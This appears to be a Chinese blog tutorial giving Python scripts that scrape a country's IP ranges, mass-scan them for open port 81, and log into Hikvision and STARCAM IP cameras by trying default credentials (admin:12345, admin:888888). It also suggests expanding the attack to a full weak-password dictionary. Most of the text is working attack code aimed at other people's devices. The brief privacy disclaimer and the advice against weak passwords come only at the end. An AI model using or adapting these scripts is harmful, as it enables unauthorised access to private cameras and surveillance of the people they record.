目录
确定想扫描的IP范围
首先要确定要扫描的ip范围,可以自己定手写,我是按地域从网站上爬取的。
#coding:utf-8
import requests
from bs4 import BeautifulSoup
from urllib import quote
import re
place_name = "日本"
url_ = 'http://ip.yqie.com/search.aspx?searchword=' + quote(place_name) + "&pagecurrent="
pagecount = re.findall('页码:1/(\d*?)<',requests.get(url_+'1').content)
index = 1
fp = open('ip_range.txt','a')
while index < int(pagecount[0]):
url = url_ + str(index)
page = requests.get(url)
soup = BeautifulSoup(page.content,'lxml').find_all("tr")
j = 0
for i in soup:
if j == 0:
j = 1
continue
fp.write(i.contents[1].contents[0] + ' ' + i.contents[3].contents[0] + '\n')
index = index + 1
fp.close()
生成以下格式的文本:
171.105.32.0 171.105.33.255
171.105.34.0 171.105.35.255
171.105.36.0 171.105.36.255
171.105.37.0 171.105.38.255
171.105.39.0 171.105.79.255
扫描开放81端口的IP
针对上一步的ip范围进行扫描,记录开放81端口的ip.
#coding:utf-8
import socket
import struct
import threading
lock = threading.Lock()
def write_ip(ip):
fp = open('ip_81.txt','a')
fp.write(ip+'\n')
fp.close()
def scan(ip,port):
global lock
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(0.5)
try:
result = s.connect_ex((ip,port))
if result == 0:
lock.acquire()
write_ip(ip)
lock.release()
s.close()
except:
s.close()
def get_ip_range():
fp = open("ip_range.txt",'r')
list = fp.readlines()
fp.close()
return list
def main():
port = 81
ip_list = get_ip_range()
for ip_range in ip_list:
start = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[0]))[0])
end = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[1]))[0])
print ip_range.strip()
while start < end:
while threading.active_count() < 100 and start < end: ip_point = socket.inet_ntoa(struct.pack('>I',start))
t = threading.Thread( target=scan, args =(ip_point,port,) )
t.start()
start = start + 1
if __name__ == '__main__':
main()
在这儿使用多线程扫描,不然扫描太慢了。当然线程数根据自己电脑配置自己看着来吧。别把自己电脑玩死机就ok。
针对海康威视的扫描
#coding:utf-8
import requests
import threading
lock = threading.Lock()
def browse(ip,port):
url = 'http://' + ip + ':' + str(port)
userpwd = 'Basic YWRtaW46MTIzNDU='
#userpwd = 'YWRtaW46ODg4ODg4'
headers = {
'X-Requested-With' : 'XMLHttpRequest',
'Refer' : url + '/doc/page/login.asp',
'If-Modified-Since' : '0' ,
'Authorization' :userpwd
}
try:
r = requests.get(url = url + '/ISAPI/Security/userCheck', headers = headers, timeout = 2)
if r.status_code == 200 and r.text.find('OK') != -1:
print url
lock.acquire()
fd = open('hikvision.txt','a')
fd.write(url + '/doc/page/login.asp' + '\n')
fd.close()
lock.release()
except:
pass
if __name__ == '__main__':
fp = open("ip_81.txt",'r')
list = fp.readlines()
fp.close()
index = 0
while index < len(list):
while threading.active_count() < 300 and index < len(list):
t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
t.start()
index = index + 1
海康威视用户检查URL(http://ip:81/ISAPI/Security/userCheck),其中HTTP头(Authorization: Basic YWRtaW46MTIzNDU=)包含用户名和密码(YWRtaW46MTIzNDU= Base64解码后为:admin:12345)。海康威视2016年前的产品貌似默认密码是12345,以后的密码就必须重置。在这只扫描了密码为12345的情况,可自行搞个弱口令字典表,全扫描一遍。
登录最好用IE浏览器,记得允许插件运行。
PS:不知道base64编码的自行google
针对STARCAM的扫描
#coding:utf-8
import requests
import threading
import traceback
lock = threading.Lock()
def browse(ip,port):
url = 'http://' + ip + ':' + str(port)
#userpwd = 'Basic YWRtaW46MTIzNDU='
userpwd = 'Basic YWRtaW46ODg4ODg4'
headers = {'Authorization' :userpwd}
try:
r = requests.get(url = url + '/monitor.htm' , headers = headers, timeout = 2)
if r.status_code == 200 and r.content.find('camera') != -1:
lock.acquire()
fd = open('hikvision.txt','a')
fd.write(url + '\n')
fd.close()
lock.release()
except Exception, e:
pass
if __name__ == '__main__':
fp = open("ip_81.txt",'r')
list = fp.readlines()
fp.close()
index = 0
while index < len(list):
while threading.active_count() < 300 and index < len(list):
t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
t.start()
index = index + 1
和海康威视原理一样,只是用的URL和response验证机制不一样。
总结
1.在这只是实验性的,代码写的丑勿喷。弱口令集合也没整,可以把以上代码整合成一个脚本。
2.用http协议的网络摄像头多少有些风险(也不是说用私有协议的就绝对安全),尽量别使用12345,888888,5201314,qwer1234之类的弱口令。
PS:IP不够使也有好处,中国IP地址多不固定。顶多过个一天个人用户的ip就变了。
3.写这文章主要是实验,千万别做坏事侵犯别人隐私。